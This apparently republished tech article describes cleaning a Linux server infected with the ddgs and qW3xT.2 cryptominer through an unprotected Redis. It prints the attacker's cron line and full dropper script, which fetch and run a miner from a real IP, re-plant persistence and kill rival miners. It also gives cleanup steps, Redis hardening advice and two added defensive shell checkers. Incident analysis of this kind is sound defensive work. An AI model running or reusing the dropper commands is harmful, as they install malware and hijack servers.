
A hands-on record of a Linux server implanted with the ddgs and qW3xT.2 mining virus

2025-02-28 Update From: SLTechnology News&Howtos

Shulou(Shulou.com)06/02 Report--

Preface

With the frenzied hype around virtual currency, mining malware has become one of the most frequent attacks carried out by criminals. The people who spread it use compromised personal computers or servers to mine. Typical symptoms are very high CPU usage, a sudden drop in free space on the C: drive, a rise in machine temperature, louder fan noise, and so on.

This article describes how to deal with a Linux server that has been implanted with the ddgs and qW3xT.2 mining virus. Let's go through it in detail.

Symptoms after the intrusion:

Two abnormal processes, qW3xT.2 and ddgs, were found consuming a large share of the CPU. Killing them only helps for a while: they reappear shortly afterwards.

After these two abnormal processes were killed, the following processes showed up after some time:

First, no scheduled script was found among the scheduled tasks in /etc/sysconfig/crontab. Running crontab -e, however, revealed this scheduled task:

    */5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

A lookup placed 149.56.106.215 in the United States. The content of the i.sh script is as follows:

    export PATH=$PATH:/bin:/usr/bin:/usr/local/bin:/usr/sbin

    echo "" > /var/spool/cron/root
    echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root
    echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/root

    mkdir -p /var/spool/cron/crontabs
    echo "" > /var/spool/cron/crontabs/root
    echo "*/15 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root
    echo "*/15 * * * * wget -q -O- http://149.56.106.215:8000/i.sh | sh" >> /var/spool/cron/crontabs/root

    ps auxf | grep -v grep | grep /tmp/ddgs.3013 || rm -rf /tmp/ddgs.3013
    if [ ! -f "/tmp/ddgs.3013" ]; then
        wget -q http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -O /tmp/ddgs.3013
        curl -fsSL http://149.56.106.215:8000/static/3013/ddgs.$(uname -m) -o /tmp/ddgs.3013
    fi
    chmod +x /tmp/ddgs.3013 && /tmp/ddgs.3013

    ps auxf | grep -v grep | grep Circle_MI | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep get.bi-chi.com | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep hashvault.pro | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep nanopool.org | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep minexmr.com | awk '{print $2}' | xargs kill
    ps auxf | grep -v grep | grep /boot/efi/ | awk '{print $2}' | xargs kill
    #ps auxf | grep -v grep | grep ddg.2006 | awk '{print $2}' | kill
    #ps auxf | grep -v grep | grep ddg.2010 | awk '{print $2}' | kill

In other words, the script re-plants its own cron entry every 15 minutes in both crontab locations, re-downloads the miner into /tmp/ddgs.3013 if it is missing, and kills competing miners so that it has the CPU to itself. That is why killing the processes by hand does not last.

Treatment method:

1. Remove the entry added with crontab -e:

    */5 * * * * curl -fsSL http://149.56.106.215:8000/i.sh | sh

2. Clear the passwordless-login keys the hacker placed in /root/.ssh/authorized_keys.

3. Change the Redis password.

4. Change the root password and the passwords of the other login accounts.
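As an added example (not code from the original article), the following POSIX shell script turns the cleanup steps above into read-only triage checks that can be re-run after cleanup to confirm the persistence is really gone: cron lines that pipe a curl/wget download into sh, payloads dropped as /tmp/ddgs.*, processes executing from /tmp, and the number of active entries in authorized_keys. All paths are passed in as arguments; the defaults in triage_report are the paths named in the article, and the sample inputs used in the demo are constructed.

```shell
#!/bin/sh
# Added example, not part of the original article: read-only triage checks for
# the persistence artifacts described above. Each check takes the file or
# directory to inspect as an argument, so it works on a live host or on copies
# pulled from one.

# Count cron lines that fetch a URL with curl/wget and pipe it straight into
# sh. Commented-out lines are ignored. Prints the count (0 if none or if no
# file could be read).
count_pipe_to_sh_cron() {
    # usage: count_pipe_to_sh_cron CRONFILE...
    cat "$@" 2>/dev/null \
        | grep -Ev '^[[:space:]]*#' \
        | grep -Ec '(curl|wget)[^|]*[|][[:space:]]*(ba)?sh([[:space:]]|$)'
}

# List regular files directly under DIR whose names follow the dropper's
# naming (ddgs.<id>), one per line; empty output means nothing was found.
find_dropped_payloads() {
    # usage: find_dropped_payloads /tmp
    find "$1" -maxdepth 1 -type f -name 'ddgs.*' 2>/dev/null | sort
}

# Count active (non-blank, non-comment) entries in an authorized_keys file.
# Comparing this against the number of keys the operator actually provisioned
# is the quickest way to spot a key the intruder added.
count_authorized_keys() {
    # usage: count_authorized_keys /root/.ssh/authorized_keys
    [ -r "$1" ] || { echo 0; return; }
    grep -Ec '^[[:space:]]*[^#[:space:]]' "$1"
}

# From a "ps -eo pid=,args=" listing on stdin, print the PIDs whose command
# path starts with /tmp/ (the article's miner ran as /tmp/ddgs.3013). Reading
# stdin lets a saved snapshot be checked the same way as the live host.
pids_running_from_tmp() {
    # usage: ps -eo pid=,args= | pids_running_from_tmp
    awk '$2 ~ /^\/tmp\// { print $1 }'
}

# Run every check against the live host using the paths from the article and
# print a short report.
triage_report() {
    printf 'cron lines piping downloads to sh: %s\n' \
        "$(count_pipe_to_sh_cron /etc/crontab /var/spool/cron/root /var/spool/cron/crontabs/root)"
    printf 'dropped payloads in /tmp:\n%s\n' "$(find_dropped_payloads /tmp)"
    printf 'processes executing from /tmp: %s\n' \
        "$(ps -eo pid=,args= | pids_running_from_tmp | tr '\n' ' ')"
    printf 'active keys in /root/.ssh/authorized_keys: %s\n' \
        "$(count_authorized_keys /root/.ssh/authorized_keys)"
}

# Only run the report when asked, so the file can be sourced for its functions
# without side effects.
if [ "${1:-}" = "--report" ]; then
    triage_report
fi
```

Run it as root with `sh triage.sh --report` before and after cleanup; a non-zero cron count or any /tmp payload after the cleanup steps means the dropper is still being re-planted, most likely because another cron location or a process spawned from /tmp was missed.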

Security recommendations:

1. Configure the bind option to restrict which IP addresses may connect to the Redis server; change Redis's default port 6379; and enable authentication (AUTH) by setting a password. Note that this password is stored in clear text in the Redis configuration file.

2. Configure the rename-command item (renaming config to "RENAME_CONFIG") so that, even if someone gains unauthorized access, it is harder for the attacker to use the config command.

3. If at all possible, block public-network access to Redis at the firewall.

Intrusion method:

From the information gathered, the intrusion exploited a Redis weakness: no password had been set, or the password was too simple. For the specific method, refer to

https://www.jb51.net/article/147375.htm

The Redis password is changed as follows:

    redis-cli -h 127.0.0.1 -p 6379
    config get requirepass                   ## show the current password
    config set requirepass "yourpassword"    ## set the password; it reverts to the default (no password) once the service restarts

The permanent method is to open the Redis configuration file redis.conf, find the requirepass entry and set the password there, as follows:

    requirepass yourpassword    ## note: there must be no spaces at the start of this line
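As an added example (not from the original article), this POSIX shell script audits a redis.conf against the recommendations above and the permanent requirepass fix: bind, requirepass, the default port and whether CONFIG has been renamed. It prints one finding per line and nothing when the file passes. The two sample configurations are constructed for the demo; the weak one mirrors the exposure described in the article, the hardened one applies its recommendations. The 16-character minimum for the password is this example's own threshold, not a Redis rule.

```shell
#!/bin/sh
# Added example, not part of the original article: audit a redis.conf for the
# weak settings that let the miner in (no bind restriction, no password, the
# default port, CONFIG left available).

# Print the value of the last uncommented occurrence of DIRECTIVE in FILE
# (everything after the directive name), or nothing if it is not set.
redis_directive() {
    # usage: redis_directive FILE DIRECTIVE
    awk -v key="$2" '$1 == key { $1 = ""; sub(/^ +/, ""); v = $0 } END { print v }' "$1"
}

# Print one finding per line for FILE; print nothing if every check passes.
audit_redis_conf() {
    conf="$1"

    bind=$(redis_directive "$conf" bind)
    case "$bind" in
        "")             echo "WEAK: no bind directive, Redis listens on every interface" ;;
        *0.0.0.0*|*\**) echo "WEAK: bind allows all interfaces ($bind)" ;;
    esac

    # Strip optional quotes so the length check sees the real password.
    pass=$(redis_directive "$conf" requirepass | tr -d '"')
    if [ -z "$pass" ]; then
        echo "WEAK: no requirepass, unauthenticated clients get full access"
    elif [ "${#pass}" -lt 16 ]; then
        # 16 characters is this example's own threshold, not a Redis rule.
        echo "WEAK: requirepass is short (${#pass} chars), easy to guess"
    fi

    case "$(redis_directive "$conf" port)" in
        ""|6379) echo "NOTE: default port 6379 in use" ;;
    esac

    # rename-command CONFIG "" disables the command; renaming it to an obscure
    # name keeps it usable by the operator. Either counts as hardened here.
    if ! awk '$1 == "rename-command" && toupper($2) == "CONFIG" { found = 1 } END { exit !found }' "$conf"; then
        echo "WEAK: CONFIG command not renamed or disabled"
    fi
}

# Number of findings for FILE (0 means it passed every check).
count_findings() {
    audit_redis_conf "$1" | grep -c . || true
}

# Constructed sample configurations for the demo.
WEAK_CONF='port 6379
bind 0.0.0.0
# requirepass not set'

HARDENED_CONF='port 16379
bind 127.0.0.1
requirepass "Lk3p9vXq2mZr8TbW4nHs"
rename-command CONFIG "cfg_9f2a7c4e"
rename-command FLUSHALL ""'

run_demo() {
    tmp=$(mktemp)
    printf '%s\n' "$WEAK_CONF" > "$tmp"
    echo "--- weak config ---";     audit_redis_conf "$tmp"
    printf '%s\n' "$HARDENED_CONF" > "$tmp"
    echo "--- hardened config ---"; audit_redis_conf "$tmp"
    rm -f "$tmp"
}

# Only run the demo when asked; otherwise the file can be sourced and
# audit_redis_conf pointed at the real /etc/redis/redis.conf.
if [ "${1:-}" = "--demo" ]; then
    run_demo
fi
```

Against the weak sample the audit reports four findings (open bind, missing password, default port, CONFIG still available); against the hardened sample it reports none. Because requirepass is stored in clear text, the configuration file itself should be readable only by the user Redis runs as, which is a file-permission matter this script does not check.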

Summary

That is the whole content of this article. I hope it has some reference and learning value for your study or work; if you have any questions, leave a message and we can discuss them. Thank you for your support.
